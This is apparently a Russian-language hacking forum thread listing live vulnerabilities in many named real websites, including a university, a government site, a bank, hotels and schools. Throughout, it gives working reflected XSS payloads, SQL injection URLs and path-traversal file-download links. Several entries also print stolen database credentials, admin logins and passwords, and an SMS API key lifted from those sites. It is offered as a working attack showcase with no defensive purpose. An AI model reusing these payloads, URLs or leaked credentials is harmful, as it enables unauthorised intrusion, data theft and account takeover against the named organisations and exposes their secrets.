Уязвимости SQLi, XSS и другие.

XSS в поле поиска. Только не знаю какая:Reflected или DOM-based
http://voices.iit.edu/
<script>alert('XSS')</script>

 

target: http://dazo.gov.ua
Type: XSS Reflected

HTML:

http://dazo.gov.ua/index.php?id="><iframe src='javascript:prompt(/XSS/)'>

 

target:https://dota2.net
Type:XSS Reflected

https://dota2.net/players/?st="><script>alert()</script>


target:csgo.tm
Type:XSS Reflected

https://csgo.tm/support/

Описание : Переходим по линке и там где надо писать сообщение в саппорт пишем наш скрипт,я пишу "><script>alert()</script>,дальше нажимаем создать тикет и вуаля(Нужно быть авторизованным в Steam . ) .

 

Target: http://www.mercerhotel.com/
Type: Arbitrary File Download
http://www.mercerhotel.com/forceDownload.php?file=../../../../../etc/passwd
www.mercerhotel.com/forceDownload.php?file=phpclasses/config.php

Code:

// $cfg['db']['host'] ="internal-db.s29207.gridserver.com";
// $cfg['db']['user'] ="db29207_hotelsab";
// $cfg['db']['password'] ="L'Tbh{)<&%C>)17";
// $cfg['db']['name']="db29207_mercerhotel";

 

Error Based SQL inject

Code:

http://hentai-x.ru/anime.php?id=3%20AND%20%28SELECT%201%20FROM%28SELECT%20COUNT%28*%29,CONCAT%28%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29,0x20%29%29,1,50%29%29,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29lol%29

srv40129_ignilx@localhost

 

Type: Arbitrary File Download

Target: avalon-school.co.uk
Vulnerable: http://avalon-school.co.uk/forcedownload.php?file=../wp-config.php

PHP:

define('DB_NAME', 'avalon_school');

/** MySQL database username */
define('DB_USER', 'avalon-school');

/** MySQL database password */
define('DB_PASSWORD', 'WEB4374dnfjv');

/** MySQL hostname */
define('DB_HOST', 'localhost');

Target: trackcars4hire.co.uk
Vulnerable: http://avalon-school.co.uk/forcedow.../../home/trackcars4hire/public_html/index.php

Target: tankers-r-us.co.uk
Vulnerable: http://avalon-school.co.uk/forcedow...../../home/tankers-r-us/public_html/index.php

Target: brighterchoices.co.uk
Vulnerable: http://avalon-school.co.uk/forcedow...../home/brighterchoices/public_html/index.php

Target: theknutsfordspa.co.uk
Vulnerable: http://avalon-school.co.uk/forcedow...../home/theknutsfordspa/public_html/index.php

Target: rhinoequipment.com.au
Vulnerable: http://avalon-school.co.uk/forcedow.../../home/rhinoequipment/public_html/index.php

Target: korusgroup.co.uk
Vulnerable: http://avalon-school.co.uk/forcedownload.php?file=../../../../home/korusgroup/public_html/index.php

Target: dentalacademy.co.uk
Vulnerable: http://avalon-school.co.uk/forcedow.../../home/dentalacademy/public_html/index.html

 

Code:

http://forum.antichat.ru/#<img src=1 onerror=alert(document.domain)>

Яндекс тИЦ 400 pr 5

 

target: http://www.kt.kz
type: XSS Reflected

Code:

http://www.kt.kz/rus/search/?text=%22%3E%3Cscript%3Ealert%28%27Hello%27%29%3C%2Fscript%3E

target: http://www.yerkramas.org/advancedsearch
type: XSS Reflected
title:

Code:

"><script>alert('Hello')</script>

target: http://www.inet.az
type: XSS Reflected
Строка поиска:

Code:

"><script>alert('Hello')</script>

target: http://www.yenixeber.com
type: XSS Reflected
Строка поиска:

Code:

"><script>alert('Hello')</script>

target: https://stat.internet.su/
type: SQL Injection
Имя пользователя,Пароль:

Code:

' OR 'a'='a

 

[колор=рэд][сайз=млн]ЯНДЕКС ТИЦ 100500 !!!![/колор][/сайз]

Code:

_ttps://drive.google.com/file/d/0B0ox2xf_0TMjWVNHRWlBTU9sSWs/view

 

Type: Arbitrary File Download
Target: 14isppgconvention.com
Vulnerable: http://www.14isppgconvention.com/forcedownload.php?file=

1. http://www.14isppgconvention.com/forcedownload.php?file=admin/index.php (GET)
Получаем:

PHP:

if($_SERVER['REQUEST_METHOD']=='POST'){
if($_POST['username']=='14isppg' && $_POST['password']=='14isppg@admin'){
    $_SESSION['user']=1;
    header('Location:home.php');
    exit;

Логин: 14isppg
Пароль: 14isppg@admin

2. Входим http://www.14isppgconvention.com/admin/
Получаем: http://www.14isppgconvention.com/admin/users.php?export=users

3. http://www.14isppgconvention.com/forcedownload.php?file=admin/users.php (GET)
Находим:

PHP:

mysql_connect("peterjacob82.powwebmysql.com", "14isppg", "14isppgS20") or die(mysql_error());

mysql_select_db("14isppg") or die(mysql_error())


Находим:

PHP:

    $FOO_USERNAME= "39ispnc";
    $FOO_PASSWORD= "n0f5qkqjba";
    $FOO_SENDERID= "ISPPGM";
    $FOO_PRIORITY= "11";

$urltopost = "http://bulksms.smslite.co.in/xmlapi.php";


 

Type: Arbitrary File Download
Target: tennismatchpoint.net
Vulnerable: www.tennismatchpoint.net/inc/forceDownload.php?file=../admin/index.php

PHP:

$PASSWORD = 'cesenatennis';
    if ($PASSWORD == $_POST['password'] && $_POST['username'] == 'admin'){

Логин: admin
Пароль: cesenatennis

 

Type: Arbitrary File Download
Target: requisur.com
Vulnerable: www.requisur.com/pdf/forcedownload.php?file=../configuration.php

PHP:

var $dbtype = 'mysqli';
    var $host = 'localhost';
    var $user = 'gtbaotmh_requisu';
    var $db = 'gtbaotmh_requisu';
    var $dbprefix = 'kxlo_';
        var $password = 'Ry&f#4d*4$0vYk';

 

Type: Local File Inclusion
Target: com-onlive.tv
Vulnerable: http://www.com-onlive.tv/wp-content/plugins/robotcpa//f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk

Type: Local File Inclusion
Target: garcinia.com-see.tv
Vulnerable: http://garcinia.com-see.tv/wp-content/plugins/robotcpa//f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk

Type: Local File Inclusion
Target: garcinia.com-see.tv
Vulnerable: http://www.truhlarstvi-rozkos.cz/fotogalerie.php?id=../../../../../../../../../../etc/passwd

 

target:ykt.ru
Type:XSS-Reflected
Заходим сюда по линке
ykt.ru/search/image?q=&t=0&s=0&sid=14&ws=6941337<a>%22%27&we=
В поиске вводим "><script>alert("WX")</script>
И видим XSS .

 

target:hochu.ua
Type : XSS-Reflected
Описание :
В поиске вводим : "><script>alert("WX")</script>
Готовая линка : http://hochu.ua/search/?q="><script>alert("WX")</script>

 

target: http://www.globexbank.ru/
type: XSS Reflected
Курс обмена валют:

Code:

"><script>alert('Hello')</script>

 

Type: SQL Injection
Target: intergips.com.ua
Vulnerable:

Code:

http://intergips.com.ua/index.php?item_id=-3445%27%20UNION%20ALL%20SELECT%20CONCAT%280x717a787a71%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%2C0x71786b7171%29--%20

 

Type: SQL Injection
Target: *.mystart.com (212 alexa rang)

PoC:

Code:

_ttp://apps2.mystart.com/ui/site/index.php?tb=vmndtxtb&cid=-2+union+select+1,user(),3,4+from+mysql.user+--
File_priv=Y

 

SIXSS
http://apps2.mystart.com/ui/site/in...27293c2f7363726970743e,3,4+from+mysql.user+--

 

Target:http://www.ecco-shoes.ru/search
Type:XSS-Reflected
Описание: Переходим в любой раздел "Для мужчин/женщин" . Ищем поиск по артиклу и вбиваем в оба поля .

Code:

"><script>alert('Hello')</script> . 

а также

Code:

www.ecco-shoes.ru/shops/?country=UNION SELECT 1,2,3,'<script>alert('SIXSS')</script>',5,6 --&region=Архангельская+область&town=Архангельск

Да и вообще на этом сайте много XSS .